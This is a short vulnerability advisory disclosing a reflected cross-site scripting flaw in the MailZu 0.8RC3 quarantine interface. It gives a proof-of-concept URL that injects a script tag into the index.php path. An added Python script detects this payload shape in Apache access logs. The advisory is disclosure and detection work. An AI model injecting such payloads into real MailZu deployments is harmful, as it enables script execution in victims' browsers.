MailZu 0.8RC3 Cross Site Scripting

2017.01.19
Credit: Nassim Asrir
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

[+]###################################################################################################
[+] Title: MailZu 0.8RC3 - Reflected Cross Site Scripting
[+] Credits / Discovery: Nassim Asrir
[+] Author Email: wassline@gmail.com
[+] Author Company: Henceforth
[+]###################################################################################################

Vendor:
===============
https://sourceforge.net/

Product:
===============
0.8RC3

Download:
===========
https://sourceforge.net/projects/mailzu/files/mailzu/

MailZu is a simple and intuitive web interface to manage the Amavisd-new quarantine. Users can view their own quarantine, release/delete messages, or request the release of messages.

Vulnerability Type:
======================================
Reflected Cross Site Scripting.

CVE Reference:
===============
N/A

Tested on:
===============
Windows 7
Apache/2.4.23 (Win64)

Exploit/POC:
============
1) Navigate to the server: http://server/index.php
2) Inject the XSS payload in the path: http://server/index.php/"><script>alert(1);</script>
3) Done!

Network Access:
===============
Remote

Impact:
=================
Execute malicious scripts

Severity:
===========
High

Disclosure Timeline:
=====================
January 18, 2017 : Public Disclosure
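The advisory's PoC puts the payload in the PATH_INFO after index.php rather than in a query string, so it lands in the request path of the web server's access log. As an added detection example (not part of the advisory or of MailZu), the following scans Apache combined-log lines for paths that carry a markup breakout of that shape; the log lines are constructed for illustration, and the client addresses and user agents are made up.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-log lines (not from the advisory); the two
# flagged entries carry the PATH_INFO payload shape the advisory describes,
# once URL-encoded by a browser and once raw as Apache escapes it ('\"').
SAMPLE_LOG = r'''
203.0.113.5 - - [19/Jan/2017:10:02:11 +0100] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [19/Jan/2017:10:02:40 +0100] "GET /index.php/%22%3E%3Cscript%3Ealert(1);%3C/script%3E HTTP/1.1" 200 5211 "-" "Mozilla/5.0"
198.51.100.7 - - [19/Jan/2017:10:03:02 +0100] "GET /index.php/\"><script>alert(1);</script> HTTP/1.1" 200 5211 "-" "curl/7.50"
198.51.100.9 - - [19/Jan/2017:10:04:15 +0100] "GET /messagesIndex.php?page=2 HTTP/1.1" 200 7012 "-" "Mozilla/5.0"
'''

# client ip, method, path, status from the combined log format
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
# Markers of an attribute/markup breakout inside a path: an HTML tag,
# a quote immediately followed by '>', or a javascript: scheme.
XSS_RE = re.compile(r'<\s*/?\s*[a-z]|["\']\s*>|javascript:', re.I)


def normalize_path(path: str) -> str:
    """Undo Apache's log escaping of quotes and (bounded) repeated URL encoding."""
    path = path.replace('\\"', '"')
    for _ in range(3):  # stop once a decoding pass changes nothing
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def is_xss_attempt(path: str) -> bool:
    """True when the decoded request path carries a markup breakout."""
    return XSS_RE.search(normalize_path(path)) is not None


def scan_log(text: str) -> list:
    """Return (client_ip, decoded_path) for each request flagged as a reflected-XSS probe."""
    hits = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        ip, _method, path, _status = m.groups()
        if is_xss_attempt(path):
            hits.append((ip, normalize_path(path)))
    return hits


if __name__ == "__main__":
    for ip, path in scan_log(SAMPLE_LOG):
        print(f"{ip} -> {path}")
```

Decoding before matching matters: the browser-encoded variant and the raw variant collapse to the same path, so both are reported while the ordinary index.php and messagesIndex.php requests are not.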


Copyright 2018, cxsecurity.com